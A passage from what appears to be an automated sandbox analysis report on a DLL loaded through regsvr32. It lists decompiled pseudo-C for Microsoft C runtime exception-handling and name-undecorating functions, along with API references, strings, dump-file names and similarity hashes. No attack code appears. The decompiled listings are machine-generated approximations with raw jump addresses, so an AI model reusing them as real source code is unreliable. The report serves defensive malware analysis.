				 *((long long*)(_t282 + 0x47)) = "bad exception";
				E00007FFD7FFD2B064F80(_t282 - 0x11, _t282 + 0x47);
				 *((long long*)(_t282 - 0x11)) = 0x2b0c2ca8;
				E00007FFD7FFD2B067D3C(_t152, r13d -  *_t306, _t213 + _t277 + _t226, _t226, _t282 - 0x11, 0x2b0c5c58, _t275, _t303, _t273, _t277);
				asm("int3");
				if ( *_t275 != 0xe06d7363) goto 0x2b0805bf;
				if ( *((intOrPtr*)(_t275 + 0x18)) != 4) goto 0x2b0805bf;
				if ( *((intOrPtr*)(_t275 + 0x20)) == 0x19930520) goto 0x2b0803b7;
				if ( *((intOrPtr*)(_t275 + 0x20)) == 0x19930521) goto 0x2b0803b7;
				if ( *((intOrPtr*)(_t275 + 0x20)) != 0x19930522) goto 0x2b0805bf;
				if (_t226[3] <= 0) goto 0x2b080504;
				r8d =  *((intOrPtr*)(_t282 + 0x77));
				 *(_t285 + 0x30) = _t322;
				 *(_t285 + 0x28) = _t282 - 0x31;
				_t217 = _t282 - 0x39;
				r9d = 0;
				 *(_t285 + 0x20) = _t217;
				E00007FFD7FFD2B07E8E0(__ebx, _t217, _t226, _t226, _t277 + 0x14);
				if ( *((intOrPtr*)(_t282 - 0x39)) -  *((intOrPtr*)(_t282 - 0x31)) >= 0) goto 0x2b080504;
				_t54 = _t217 + 0x10; // 0x10
				_t308 = _t54;
				if ( *((intOrPtr*)(_t308 - 0x10)) > 0) goto 0x2b0804ea;
				if (0 -  *((intOrPtr*)(_t308 - 0xc)) > 0) goto 0x2b0804ea;
				E00007FFD7FFD2B07E4B4(_t217);
				r14d =  *((intOrPtr*)(_t308 - 4));
				_t314 =  *_t308 + _t217;
				if (r14d <= 0) goto 0x2b0804dc;
				E00007FFD7FFD2B07E4CC(_t217);
				_t218 = _t217 +  *((intOrPtr*)( *((intOrPtr*)(_t275 + 0x30)) + 0xc)) + 4;
				 *((long long*)(_t282 - 0x29)) = _t218;
				E00007FFD7FFD2B07E4CC(_t218);
				_t154 =  *((intOrPtr*)(_t218 +  *((intOrPtr*)( *((intOrPtr*)(_t275 + 0x30)) + 0xc))));
				 *((intOrPtr*)(_t282 - 0x35)) = _t154;
				if (_t154 <= 0) goto 0x2b080490;
				E00007FFD7FFD2B07E4CC(_t218);
				 *((long long*)(_t282 - 0x19)) = _t218 +  *((intOrPtr*)( *((intOrPtr*)(_t282 - 0x29))));
				if (E00007FFD7FFD2B07EE0C(_t154, _t226, _t314, _t218 +  *((intOrPtr*)( *((intOrPtr*)(_t282 - 0x29)))), _t275, _t277 + 0x14,  *((intOrPtr*)(_t275 + 0x30))) != 0) goto 0x2b080499;
				 *((long long*)(_t282 - 0x29)) =  *((long long*)(_t282 - 0x29)) + 4;
				_t138 =  *((intOrPtr*)(_t282 - 0x35)) - 1;
				 *((intOrPtr*)(_t282 - 0x35)) = _t138;
				if (_t138 > 0) goto 0x2b080459;
				r14d = r14d - 1;
				goto 0x2b080423;
				r14b = 1;
				 *((char*)(_t285 + 0x40)) =  *((intOrPtr*)(_t282 + 0x6f));
				_t77 = _t308 - 0x10; // 0x0
				 *(_t285 + 0x38) = _t77;
				_t221 =  *((intOrPtr*)(_t282 - 0x19));
				 *(_t285 + 0x30) = _t221;
				 *(_t285 + 0x28) = _t314 + 0x14;
				 *((intOrPtr*)(_t282 + 0x47)) = r14b;
				 *(_t285 + 0x20) = _t226;
				E00007FFD7FFD2B07FE34(_t163, _t226, _t275,  *((intOrPtr*)(_t282 + 0x4f)), _t282,  *((intOrPtr*)(_t282 + 0x57)), _t322);
				goto 0x2b0804e4;
				r14b =  *((intOrPtr*)(_t282 + 0x47));
				_t156 =  *((intOrPtr*)(_t282 - 0x39)) + 1;
				 *((intOrPtr*)(_t282 - 0x39)) = _t156;
				if (_t156 -  *((intOrPtr*)(_t282 - 0x31)) < 0) goto 0x2b0803fc;
				if (r14b != 0) goto 0x2b080590;
				if (( *_t226 & 0x1fffffff) - 0x19930521 < 0) goto 0x2b080590;
				_t167 = _t226[8];
				if (_t167 == 0) goto 0x2b080526;
				E00007FFD7FFD2B07E4B4(_t221);
				goto 0x2b080528;
				if (_t221 + _t167 == 0) goto 0x2b080590;
				if (_t167 == 0) goto 0x2b080542;
				E00007FFD7FFD2B07E4B4(_t221 + _t167);
				_t223 = _t226[8];
				goto 0x2b080544;
				if (E00007FFD7FFD2B07F534(_t156, _t223, _t226, _t275, _t221 + _t167 + _t223, _t167, _t282) != 0) goto 0x2b080590;
				E00007FFD7FFD2B07E3C8(_t163, _t223, _t226,  *((intOrPtr*)(_t282 + 0x4f)), _t322, _t167, _t282, _t226, _t282 + 0x47);
				 *((char*)(_t285 + 0x40)) =  *((intOrPtr*)(_t282 + 0x6f));
				 *(_t285 + 0x38) = _t322;
				 *(_t285 + 0x30) = _t226;
				 *(_t285 + 0x28) =  *(_t285 + 0x28) | 0xffffffff;
				 *(_t285 + 0x20) =  *(_t285 + 0x20) & 0x00000000;
				E00007FFD7FFD2B07EAE4(E00007FFD7FFD2B07F534(_t156, _t223, _t226, _t275, _t221 + _t167 + _t223, _t167, _t282),  *((intOrPtr*)(_t282 + 0x4f)), _t275,  *((intOrPtr*)(_t282 + 0x57)), _t223);
				E00007FFD7FFD2B067F5C( *((intOrPtr*)(_t282 + 0x6f)), E00007FFD7FFD2B07F534(_t156, _t223, _t226, _t275, _t221 + _t167 + _t223, _t167, _t282), _t223,  *((intOrPtr*)(_t282 + 0x4f)), _t167,  *((intOrPtr*)(_t282 + 0x57)));
				if ( *((long long*)(_t223 + 0x108)) == 0) goto 0x2b0805a4;
				return E00007FFD7FFD2B072484(_t223);
			}

0x7ffd2b080130
0x7ffd2b080130
0x7ffd2b080130
0x7ffd2b080133
0x7ffd2b080137
0x7ffd2b08013b
0x7ffd2b08014a
0x7ffd2b08014e
0x7ffd2b080155
0x7ffd2b080159
0x7ffd2b08015c
0x7ffd2b08015f
0x7ffd2b080168
0x7ffd2b08016e
0x7ffd2b080184
0x7ffd2b080186
0x7ffd2b0801a1
0x7ffd2b0801a7
0x7ffd2b0801aa
0x7ffd2b0801af
0x7ffd2b0801b2
0x7ffd2b0801bb
0x7ffd2b0801c0
0x7ffd2b0801ca
0x7ffd2b0801cf
0x7ffd2b0801d4
0x7ffd2b0801d6
0x7ffd2b0801e1
0x7ffd2b0801eb
0x7ffd2b0801f8
0x7ffd2b080201
0x7ffd2b08020a
0x7ffd2b080215
0x7ffd2b08021b
0x7ffd2b080228
0x7ffd2b08022e
0x7ffd2b080233
0x7ffd2b08023a
0x7ffd2b08024a
0x7ffd2b080262
0x7ffd2b080264
0x7ffd2b08026f
0x7ffd2b080275
0x7ffd2b08027e
0x7ffd2b080287
0x7ffd2b080290
0x7ffd2b080297
0x7ffd2b080299
0x7ffd2b08029e
0x7ffd2b0802ab
0x7ffd2b0802b1
0x7ffd2b0802b6
0x7ffd2b0802bd
0x7ffd2b0802c5
0x7ffd2b0802d7
0x7ffd2b0802dd
0x7ffd2b0802e4
0x7ffd2b0802e8
0x7ffd2b0802f2
0x7ffd2b0802fa
0x7ffd2b0802fc
0x7ffd2b080309
0x7ffd2b08030e
0x7ffd2b080316
0x7ffd2b08032b
0x7ffd2b08032d
0x7ffd2b080338
0x7ffd2b08033a
0x7ffd2b08033f
0x7ffd2b080345
0x7ffd2b080359
0x7ffd2b08035d
0x7ffd2b080374
0x7ffd2b080378
0x7ffd2b08037d
0x7ffd2b080388
0x7ffd2b080392
0x7ffd2b08039f
0x7ffd2b0803a8
0x7ffd2b0803b1
0x7ffd2b0803bb
0x7ffd2b0803c1
0x7ffd2b0803c9
0x7ffd2b0803ce
0x7ffd2b0803d3
0x7ffd2b0803d7
0x7ffd2b0803e0
0x7ffd2b0803e5
0x7ffd2b0803f2
0x7ffd2b0803f8
0x7ffd2b0803f8
0x7ffd2b080401
0x7ffd2b08040c
0x7ffd2b080412
0x7ffd2b08041b
0x7ffd2b080420
0x7ffd2b080426
0x7ffd2b08042c
0x7ffd2b080439
0x7ffd2b08043e
0x7ffd2b080442
0x7ffd2b08044f
0x7ffd2b080452
0x7ffd2b080457
0x7ffd2b080459
0x7ffd2b080472
0x7ffd2b08047d
0x7ffd2b080482
0x7ffd2b080487
0x7ffd2b080489
0x7ffd2b08048e
0x7ffd2b080490
0x7ffd2b080497
0x7ffd2b0804a0
0x7ffd2b0804a3
0x7ffd2b0804a7
0x7ffd2b0804af
0x7ffd2b0804b4
0x7ffd2b0804bb
0x7ffd2b0804c0
0x7ffd2b0804cc
0x7ffd2b0804d0
0x7ffd2b0804d5
0x7ffd2b0804da
0x7ffd2b0804dc
0x7ffd2b0804ea
0x7ffd2b0804f0
0x7ffd2b0804f5
0x7ffd2b0804fe
0x7ffd2b080510
0x7ffd2b080512
0x7ffd2b080517
0x7ffd2b08051c
0x7ffd2b080524
0x7ffd2b08052b
0x7ffd2b08052f
0x7ffd2b080531
0x7ffd2b080539
0x7ffd2b080540
0x7ffd2b08054e
0x7ffd2b08055d
0x7ffd2b080569
0x7ffd2b08056d
0x7ffd2b080572
0x7ffd2b080577
0x7ffd2b08057c
0x7ffd2b08058b
0x7ffd2b080590
0x7ffd2b08059d
0x7ffd2b0805be

APIs

Part of subcall function 00007FFD2B07E3C8: RtlLookupFunctionEntry.KERNEL32 ref: 00007FFD2B07E43C

__GetUnwindTryBlock.LIBCMT ref: 00007FFD2B080194
__SetUnwindTryBlock.LIBCMT ref: 00007FFD2B0801BB

Part of subcall function 00007FFD2B067D3C: RaiseException.KERNEL32 ref: 00007FFD2B067DB7

__GetUnwindTryBlock.LIBCMT ref: 00007FFD2B0801C5
_getptd.LIBCMT ref: 00007FFD2B08021B
_getptd.LIBCMT ref: 00007FFD2B08022E
_getptd.LIBCMT ref: 00007FFD2B08023A
_SetThrowImageBase.LIBCMT ref: 00007FFD2B08024E
_getptd.LIBCMT ref: 00007FFD2B08029E
_getptd.LIBCMT ref: 00007FFD2B0802B1
_getptd.LIBCMT ref: 00007FFD2B0802BD
type_info::operator==.LIBCMT ref: 00007FFD2B080324
std::exception::exception.LIBCMT ref: 00007FFD2B08035D
_getptd.LIBCMT ref: 00007FFD2B080590
std::exception::exception.LIBCMT ref: 00007FFD2B080609

Strings

bad exception, xrefs: 00007FFD2B08034A
csm, xrefs: 00007FFD2B080382
csm, xrefs: 00007FFD2B080269
csm, xrefs: 00007FFD2B0801DB

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: _getptd$BlockUnwind$std::exception::exception$BaseEntryExceptionFunctionImageLookupRaiseThrowtype_info::operator==
String ID: bad exception$csm$csm$csm
API String ID: 1639654010-820278400
Opcode ID: f76ac061e4158927cc27cd36f8d008ec2b2907da4b1d6f2bd5993910a0c154e3
Instruction ID: 647cea7d3c31e746cccf17589eca4fea59e9dcfdcc8e1a82a86fe7ff1a55018e
Opcode Fuzzy Hash: f76ac061e4158927cc27cd36f8d008ec2b2907da4b1d6f2bd5993910a0c154e3
Instruction Fuzzy Hash: C7E11F32B0AA4286EB269F219A607BD7764FF06784F100135DE4D077A6DFBCE551E390

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B07FC24 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 129
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00007FFD7FFD2B07FC24(void* __ecx, intOrPtr __edi, long long __rax, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __rbp, void* __r8, void* __r9, long long _a8, long long _a16, long long _a24, long long _a32) {
				void* _v24;
				intOrPtr _v52;
				char _v56;
				long long _v64;
				long long _v72;
				long long _v80;
				intOrPtr _v88;
				intOrPtr _t71;
				char _t73;
				long long _t98;
				intOrPtr _t99;
				intOrPtr* _t101;
				intOrPtr* _t102;
				intOrPtr* _t126;
				void* _t130;

				_t98 = __rax;
				_t69 = __ecx;
				_a16 = __rbx;
				_a24 = __rsi;
				_a32 = __rdi;
				_v64 = _t130 - 0x60;
				_t73 = r8d;
				if (__rcx != 0) goto 0x2b07fc57;
				goto 0x2b07fe18;
				_t101 =  *((intOrPtr*)(__rcx));
				if (__rdx == 0) goto 0x2b07fc65;
				if ( *((char*)(__rdx + 0x10)) != 0) goto 0x2b07fc87;
				if ( *_t101 == 0xe0434f4d) goto 0x2b07fdc5;
				if ( *_t101 == 0xe0434352) goto 0x2b07fdc5;
				if ((r8b & 0x00000040) == 0) goto 0x2b07fdc5;
				if ( *_t101 != 0xe06d7363) goto 0x2b07fc50;
				if ( *((intOrPtr*)(_t101 + 0x18)) != 4) goto 0x2b07fc50;
				if ( *((intOrPtr*)(_t101 + 0x20)) == 0x19930520) goto 0x2b07fcb0;
				if ( *((intOrPtr*)(_t101 + 0x20)) == 0x19930521) goto 0x2b07fcb0;
				if ( *((intOrPtr*)(_t101 + 0x20)) != 0x19930522) goto 0x2b07fc50;
				if ( *((long long*)(_t101 + 0x30)) != 0) goto 0x2b07fcd2;
				E00007FFD7FFD2B067F5C(__ecx,  *((long long*)(_t101 + 0x30)), __rax, __rcx, __rsi, __r8);
				if ( *((long long*)(_t98 + 0xf0)) == 0) goto 0x2b07fc50;
				E00007FFD7FFD2B067F5C(_t69,  *((long long*)(_t98 + 0xf0)), _t98, __rcx, __rsi, __r8);
				_t102 =  *((intOrPtr*)(_t98 + 0xf0));
				E00007FFD7FFD2B07E4B4(_t98);
				_v72 = _t98;
				E00007FFD7FFD2B07E500(_t98,  *((intOrPtr*)(_t102 + 0x38)));
				0x2b07e2e2();
				_a8 = _t98;
				E00007FFD7FFD2B07E4E4(_t98, _t98);
				_v52 = __edi;
				_v56 = _t73;
				asm("bts esi, 0x1f");
				_v56 = _t73;
				E00007FFD7FFD2B07E4CC(_t98);
				_t26 =  *((intOrPtr*)( *((intOrPtr*)(_t102 + 0x30)) + 0xc)) + 4; // 0x4
				_t126 = _t98 + _t26;
				_v80 = _t126;
				E00007FFD7FFD2B07E4CC(_t98);
				_t71 =  *((intOrPtr*)(_t98 +  *((intOrPtr*)( *((intOrPtr*)(_t102 + 0x30)) + 0xc))));
				_v88 = _t71;
				if (_t71 <= 0) goto 0x2b07fdb8;
				E00007FFD7FFD2B07E4CC(_t98);
				_t99 =  *_t126;
				if (E00007FFD7FFD2B07EE0C(_t69, _t102,  &_v56, _t98 + _t99, __rdx - _a8, _t126,  *((intOrPtr*)(_t102 + 0x30))) == 0) goto 0x2b07fda7;
				E00007FFD7FFD2B067F5C(_t69, E00007FFD7FFD2B07EE0C(_t69, _t102,  &_v56, _t98 + _t99, __rdx - _a8, _t126,  *((intOrPtr*)(_t102 + 0x30))), _t99,  &_v56, _t126,  *((intOrPtr*)(_t102 + 0x30)));
				 *((intOrPtr*)(_t99 + 0x100)) =  *((intOrPtr*)(_t99 + 0x100)) + 1;
				if (__r9 == 0) goto 0x2b07fd96;
				E00007FFD7FFD2B070450(E00007FFD7FFD2B07FB74(_t99, _t102, _t102, __r9, _t126,  &_v56, _t98 + _t99));
				_v88 = _t71 - 1;
				_v80 = _t126 + 4;
				goto 0x2b07fd4c;
				E00007FFD7FFD2B07E4E4(_t99, _t98);
				goto 0x2b07fc50;
				if ( *_t102 != 0xe06d7363) goto 0x2b07fe08;
				if ( *((intOrPtr*)(_t102 + 0x18)) != 4) goto 0x2b07fe08;
				if ( *((intOrPtr*)(_t102 + 0x20)) == 0x19930520) goto 0x2b07fdee;
				if ( *((intOrPtr*)(_t102 + 0x20)) == 0x19930521) goto 0x2b07fdee;
				if ( *((intOrPtr*)(_t102 + 0x20)) != 0x19930522) goto 0x2b07fe08;
				if ( *((long long*)(_t102 + 0x30)) != 0) goto 0x2b07fe08;
				E00007FFD7FFD2B067F5C(_t69,  *((long long*)(_t102 + 0x30)), _t99, _t98, _t126 + 4,  &_v56);
				if ( *((long long*)(_t99 + 0xf0)) == 0) goto 0x2b07fc50;
				E00007FFD7FFD2B067F5C(_t69,  *((long long*)(_t99 + 0xf0)), _t99, _t98, _t126 + 4,  &_v56);
				 *((intOrPtr*)(_t99 + 0x100)) =  *((intOrPtr*)(_t99 + 0x100)) + 1;
				return 1;
			}

0x7ffd2b07fc24
0x7ffd2b07fc24
0x7ffd2b07fc24
0x7ffd2b07fc29
0x7ffd2b07fc2e
0x7ffd2b07fc3d
0x7ffd2b07fc45
0x7ffd2b07fc4e
0x7ffd2b07fc52
0x7ffd2b07fc57
0x7ffd2b07fc5d
0x7ffd2b07fc63
0x7ffd2b07fc6b
0x7ffd2b07fc77
0x7ffd2b07fc81
0x7ffd2b07fc8d
0x7ffd2b07fc93
0x7ffd2b07fc9c
0x7ffd2b07fca5
0x7ffd2b07fcae
0x7ffd2b07fcb5
0x7ffd2b07fcb7
0x7ffd2b07fcc4
0x7ffd2b07fcc6
0x7ffd2b07fccb
0x7ffd2b07fcd2
0x7ffd2b07fcda
0x7ffd2b07fce3
0x7ffd2b07fcf4
0x7ffd2b07fcf9
0x7ffd2b07fd04
0x7ffd2b07fd11
0x7ffd2b07fd15
0x7ffd2b07fd19
0x7ffd2b07fd1d
0x7ffd2b07fd21
0x7ffd2b07fd2e
0x7ffd2b07fd2e
0x7ffd2b07fd33
0x7ffd2b07fd38
0x7ffd2b07fd45
0x7ffd2b07fd48
0x7ffd2b07fd4e
0x7ffd2b07fd50
0x7ffd2b07fd58
0x7ffd2b07fd71
0x7ffd2b07fd73
0x7ffd2b07fd78
0x7ffd2b07fd81
0x7ffd2b07fda2
0x7ffd2b07fda9
0x7ffd2b07fdb1
0x7ffd2b07fdb6
0x7ffd2b07fdbb
0x7ffd2b07fdc0
0x7ffd2b07fdcb
0x7ffd2b07fdd1
0x7ffd2b07fdda
0x7ffd2b07fde3
0x7ffd2b07fdec
0x7ffd2b07fdf3
0x7ffd2b07fdf5
0x7ffd2b07fe02
0x7ffd2b07fe08
0x7ffd2b07fe0d
0x7ffd2b07fe32

APIs

_getptd.LIBCMT ref: 00007FFD2B07FCB7
_getptd.LIBCMT ref: 00007FFD2B07FCC6
_SetThrowImageBase.LIBCMT ref: 00007FFD2B07FCE3
RtlPcToFileHeader.KERNEL32 ref: 00007FFD2B07FCF4
_SetImageBase.LIBCMT ref: 00007FFD2B07FD04
_getptd.LIBCMT ref: 00007FFD2B07FD73
_SetImageBase.LIBCMT ref: 00007FFD2B07FDBB
_getptd.LIBCMT ref: 00007FFD2B07FDF5
_getptd.LIBCMT ref: 00007FFD2B07FE08

Strings

csm, xrefs: 00007FFD2B07FDC5
RCC, xrefs: 00007FFD2B07FC71
MOC, xrefs: 00007FFD2B07FC65
csm, xrefs: 00007FFD2B07FC87

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: _getptd$BaseImage$FileHeaderThrow
String ID: MOC$RCC$csm$csm
API String ID: 3373144978-1441736206
Opcode ID: d869b05e530e87ff415775855786cb5448b1e7eea84fe5cef8c203ffc563e878
Instruction ID: 714849874a0b7a302c4f5f0400d2e14a707dfeaf7a80ee21beac0c947d003511
Opcode Fuzzy Hash: d869b05e530e87ff415775855786cb5448b1e7eea84fe5cef8c203ffc563e878
Instruction Fuzzy Hash: 6451A532A0A68285EB629F21DA14378B3A4FF55B84F144135DE4D477A6CFBCE441F781

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B06BD90 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 124
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 56%

			E00007FFD7FFD2B06BD90(void* __ecx, void* __esi, long long __rbx, long long* __rcx, long long __rdi, long long __rsi, long long _a8, long long _a16) {
				void* _v8;
				char _v24;
				char _v40;
				signed int _v48;
				signed long long _v56;
				signed int _v64;
				signed long long _v72;
				signed int _v88;
				void* _t49;
				void* _t50;
				void* _t58;
				char* _t74;
				char* _t75;
				char* _t76;
				char* _t77;
				char* _t78;
				char* _t79;
				long long* _t97;
				long long* _t109;
				void* _t118;
				void* _t119;

				_t111 = __rsi;
				_t82 = __rbx;
				_t58 = __esi;
				_t50 = __ecx;
				_a8 = __rbx;
				_a16 = __rdi;
				asm("movups xmm0, [edx]");
				_t109 = __rcx;
				asm("movdqu [ecx], xmm0");
				if ( *((char*)(__rcx + 8)) - 1 > 0) goto 0x2b06bf6c;
				_t74 =  *0x2b0c9a70; // 0x0
				if ( *_t74 == 0) goto 0x2b06bf3c;
				_v72 = _v72 & 0x00000000;
				_v56 = _v56 & 0x00000000;
				_v88 = _v88 & 0x00000000;
				_v64 = _v64 & 0xffff0000;
				_v48 = _v48 & 0xffff0000;
				E00007FFD7FFD2B06EFA4(__rbx,  &_v24,  &_v56, __rsi, 0x2b08398d,  &_v72, _t118, _t119);
				asm("movaps xmm5, [ebp-0x10]");
				asm("movdqa [ebp-0x20], xmm5");
				E00007FFD7FFD2B06AF5C(0x20, _t58, _t74, _t82,  &_v40, _t111, 0x2b08398d);
				asm("movaps xmm5, [ebp-0x20]");
				asm("movdqa [ebp-0x20], xmm5");
				E00007FFD7FFD2B06AC78(_t74,  &_v40, _t109);
				asm("movaps xmm5, [ebp-0x20]");
				asm("movdqu [edi], xmm5");
				if ( *((char*)(_t109 + 8)) - 1 > 0) goto 0x2b06bf6c;
				_t75 =  *0x2b0c9a70; // 0x0
				if ( *_t75 == 0x40) goto 0x2b06bf30;
				E00007FFD7FFD2B06AFE0(_t50, _t58, _t75, _t82, _t109, "{for ", _t111, 0x2b08398d);
				_t76 =  *0x2b0c9a70; // 0x0
				if ( *((char*)(_t109 + 8)) - 1 > 0) goto 0x2b06bf2b;
				if ( *_t76 == 0) goto 0x2b06bee5;
				if ( *_t76 == 0x40) goto 0x2b06bee5;
				E00007FFD7FFD2B06E6CC(0x20, _t58, _t82,  &_v24, _t109, _t111, 0x2b08398d, _t118, _t119);
				E00007FFD7FFD2B06A9A8(0x60, _t76,  &_v72);
				asm("movups xmm0, [eax]");
				asm("movdqu [ebp-0x20], xmm0");
				E00007FFD7FFD2B06AC78(_t76,  &_v40, _t76);
				asm("movaps xmm5, [ebp-0x20]");
				asm("movdqa [ebp-0x30], xmm5");
				E00007FFD7FFD2B06AF5C(0x27, _t58, _t76, _t76,  &_v56, _t111, 0x2b08398d);
				E00007FFD7FFD2B06AC78(_t76, _t109,  &_v56);
				_t77 =  *0x2b0c9a70; // 0x0
				if ( *_t77 != 0x40) goto 0x2b06bece;
				_t78 = _t77 + 1;
				 *0x2b0c9a70 = _t78;
				if ( *((char*)(_t109 + 8)) - 1 > 0) goto 0x2b06bf2b;
				if ( *_t78 == 0x40) goto 0x2b06be59;
				goto 0x2b06be4a;
				if ( *((char*)(_t109 + 8)) - 1 > 0) goto 0x2b06bf2b;
				if ( *_t78 != 0) goto 0x2b06bf1a;
				if ( *_t109 == 0) goto 0x2b06bf0d;
				E00007FFD7FFD2B06A12C(1, "s ");
				E00007FFD7FFD2B06A564(_t78, _t76, _t109, _t78, 0x2b08398d);
				goto 0x2b06bf1a;
				E00007FFD7FFD2B06A640(1, _t78, _t109);
				_t97 = _t109;
				E00007FFD7FFD2B06AF5C(0x7d, _t58, _t78, _t76, _t97, _t111, 0x2b08398d);
				_t79 =  *0x2b0c9a70; // 0x0
				if ( *_t79 != 0x40) goto 0x2b06bf6c;
				 *0x2b0c9a70 = _t79 + 1;
				goto 0x2b06bf6c;
				if ( *((char*)(_t97 + 8)) - 1 > 0) goto 0x2b06bf6c;
				E00007FFD7FFD2B06A490(1, _t79 + 1,  &_v24);
				asm("movups xmm0, [eax]");
				asm("movdqu [ebp-0x20], xmm0");
				_t49 = E00007FFD7FFD2B06AC78(_t79 + 1,  &_v40, _t109);
				asm("movups xmm5, [ebp-0x20]");
				asm("movdqu [edi], xmm5");
				return _t49;
			}

0x7ffd2b06bd90
0x7ffd2b06bd90
0x7ffd2b06bd90
0x7ffd2b06bd90
0x7ffd2b06bd90
0x7ffd2b06bd95
0x7ffd2b06bda2
0x7ffd2b06bda5
0x7ffd2b06bda8
0x7ffd2b06bdb0
0x7ffd2b06bdb6
0x7ffd2b06bdc0
0x7ffd2b06bdc6
0x7ffd2b06bdcb
0x7ffd2b06bdd0
0x7ffd2b06bde5
0x7ffd2b06bde8
0x7ffd2b06bdf3
0x7ffd2b06bdfe
0x7ffd2b06be02
0x7ffd2b06be07
0x7ffd2b06be13
0x7ffd2b06be17
0x7ffd2b06be1c
0x7ffd2b06be21
0x7ffd2b06be25
0x7ffd2b06be2d
0x7ffd2b06be33
0x7ffd2b06be3d
0x7ffd2b06be4d
0x7ffd2b06be52
0x7ffd2b06be5d
0x7ffd2b06be66
0x7ffd2b06be6b
0x7ffd2b06be71
0x7ffd2b06be7f
0x7ffd2b06be8b
0x7ffd2b06be8e
0x7ffd2b06be93
0x7ffd2b06be98
0x7ffd2b06bea2
0x7ffd2b06bea7
0x7ffd2b06beb3
0x7ffd2b06beb8
0x7ffd2b06bec2
0x7ffd2b06bec4
0x7ffd2b06bec7
0x7ffd2b06bed2
0x7ffd2b06bed7
0x7ffd2b06bee0
0x7ffd2b06bee9
0x7ffd2b06beee
0x7ffd2b06bef4
0x7ffd2b06befb
0x7ffd2b06bf06
0x7ffd2b06bf0b
0x7ffd2b06bf15
0x7ffd2b06bf1c
0x7ffd2b06bf1f
0x7ffd2b06bf24
0x7ffd2b06bf2e
0x7ffd2b06bf33
0x7ffd2b06bf3a
0x7ffd2b06bf40
0x7ffd2b06bf4b
0x7ffd2b06bf57
0x7ffd2b06bf5a
0x7ffd2b06bf5f
0x7ffd2b06bf64
0x7ffd2b06bf68
0x7ffd2b06bf80

APIs

DName::operator+=.LIBCMT ref: 00007FFD2B06BE07

Part of subcall function 00007FFD2B06AF5C: DName::doPchar.LIBCMT ref: 00007FFD2B06AF9A

DName::operator+=.LIBCMT ref: 00007FFD2B06BE1C
DName::operator+=.LIBCMT ref: 00007FFD2B06BE4D

Part of subcall function 00007FFD2B06AFE0: DName::operator=.LIBCMT ref: 00007FFD2B06B00B

DName::DName.LIBCMT ref: 00007FFD2B06BE7F

Part of subcall function 00007FFD2B06A9A8: DName::doPchar.LIBCMT ref: 00007FFD2B06A9D2

DName::operator+=.LIBCMT ref: 00007FFD2B06BE93
DName::operator+=.LIBCMT ref: 00007FFD2B06BEA7

Part of subcall function 00007FFD2B06AF5C: DName::append.LIBCMT ref: 00007FFD2B06AFCD

DName::operator+=.LIBCMT ref: 00007FFD2B06BEB3

Part of subcall function 00007FFD2B06AC78: DName::append.LIBCMT ref: 00007FFD2B06ACAA

DNameStatusNode::make.LIBCMT ref: 00007FFD2B06BEFB
DName::append.LIBCMT ref: 00007FFD2B06BF06
DName::operator=.LIBCMT ref: 00007FFD2B06BF15

Part of subcall function 00007FFD2B06E6CC: DName::DName.LIBCMT ref: 00007FFD2B06E74C
Part of subcall function 00007FFD2B06E6CC: DName::operator+=.LIBCMT ref: 00007FFD2B06E760
Part of subcall function 00007FFD2B06E6CC: DName::DName.LIBCMT ref: 00007FFD2B06E77B
Part of subcall function 00007FFD2B06E6CC: DName::operator+=.LIBCMT ref: 00007FFD2B06E791
Part of subcall function 00007FFD2B06E6CC: DName::DName.LIBCMT ref: 00007FFD2B06E7FE
Part of subcall function 00007FFD2B06E6CC: DName::operator+=.LIBCMT ref: 00007FFD2B06E816
Part of subcall function 00007FFD2B06E6CC: DName::operator+=.LIBCMT ref: 00007FFD2B06E82C
Part of subcall function 00007FFD2B06E6CC: DName::operator+=.LIBCMT ref: 00007FFD2B06E842
Part of subcall function 00007FFD2B06E6CC: UnDecorator::getZName.LIBCMT ref: 00007FFD2B06E860

DName::operator+=.LIBCMT ref: 00007FFD2B06BF1F
DName::operator+=.LIBCMT ref: 00007FFD2B06BF5F

Strings

{for , xrefs: 00007FFD2B06BE43

Memory Dump Source

